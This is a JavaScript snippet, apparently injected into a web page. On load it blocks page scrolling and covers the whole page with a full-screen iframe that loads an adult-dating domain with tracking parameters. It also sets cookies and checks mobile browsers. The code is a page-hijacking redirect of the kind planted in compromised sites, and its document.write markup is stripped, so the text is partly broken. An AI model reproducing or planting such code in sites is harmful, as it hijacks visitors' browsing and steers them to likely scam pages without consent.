document.body.style.overflow='hidden'; sid=4; var isMobile = { Android: function() { return navigator.userAgent.match(/Android/i); }, BlackBerry: function() { return navigator.userAgent.match(/BlackBerry/i); }, iOS: function() { return navigator.userAgent.match(/iPhone|iPad|iPod/i); }, Opera: function() { return navigator.userAgent.match(/Opera Mini/i); }, Windows: function() { return navigator.userAgent.match(/IEMobile/i); }, any: function() { return (isMobile.Android() || isMobile.BlackBerry() || isMobile.iOS() || isMobile.Opera() || isMobile.Windows()); } }; function getCookie(name) { var matches = document.cookie.match(new RegExp("(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)")); return matches ? decodeURIComponent(matches[1]) : undefined; } var mycooked=getCookie("viewed"); var splashko="https://hotladymeeting.life/?u=fv580k2&o=mw9k4qb&t=humanitysteam012024x"; var randomNumber = Math.random(); document.cookie = "viewed=111"; var r=document.referrer; var splashpage={ splashenabled: 1, splashpageurl: splashko, enablefrequency: 0, displayfrequency: "1 days", defineheader: "", cookiename: ["splashpagecookie", "path=/"], autohidetimer: 0, launch:false, browserdetectstr: (window.opera&&window.getSelection) || (!window.opera && window.XMLHttpRequest), output:function(){ document.write('
') document.write('') document.write('
') this.splashpageref=document.getElementById("slashpage") this.splashiframeref=window.frames["splashpage-iframe"] this.splashiframeref.location.replace(this.splashpageurl) this.standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body if (!/safari/i.test(navigator.userAgent)) this.standardbody.style.overflow="hidden" this.splashpageref.style.left=0 this.splashpageref.style.top=0 this.splashpageref.style.width="100%" this.splashpageref.style.height="100%" }, closeit:function(){ clearInterval(this.moveuptimer) this.splashpageref.style.display="none" this.splashiframeref.location.replace("about:blank") this.standardbody.style.overflow="auto" }, init:function(){ if (this.enablefrequency==1){ if (/sessiononly/i.test(this.displayfrequency)){ if (this.getCookie(this.cookiename[0]+"_s")==null){ this.setCookie(this.cookiename[0]+"_s", "loaded") this.launch=true } } else if (/day/i.test(this.displayfrequency)){ if (this.getCookie(this.cookiename[0])==null || parseInt(this.getCookie(this.cookiename[0]))!=parseInt(this.displayfrequency)){ this.setCookie(this.cookiename[0], parseInt(this.displayfrequency), parseInt(this.displayfrequency)) this.launch=true } } } else this.launch=true if (this.launch){ this.output() if (parseInt(this.autohidetimer)>0) setTimeout("splashpage.closeit()", parseInt(this.autohidetimer)*1000) } }, getCookie:function(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null }, setCookie:function(name, value, days){ var expireDate = new Date() if (typeof days!="undefined"){ var expstring=expireDate.setDate(expireDate.getDate()+parseInt(days)) document.cookie = name+"="+value+"; expires="+expireDate.toGMTString()+"; "+splashpage.cookiename[1] } else document.cookie = name+"="+value+"; "+splashpage.cookiename[1] } } if (splashpage.browserdetectstr && splashpage.splashenabled==1) splashpage.init()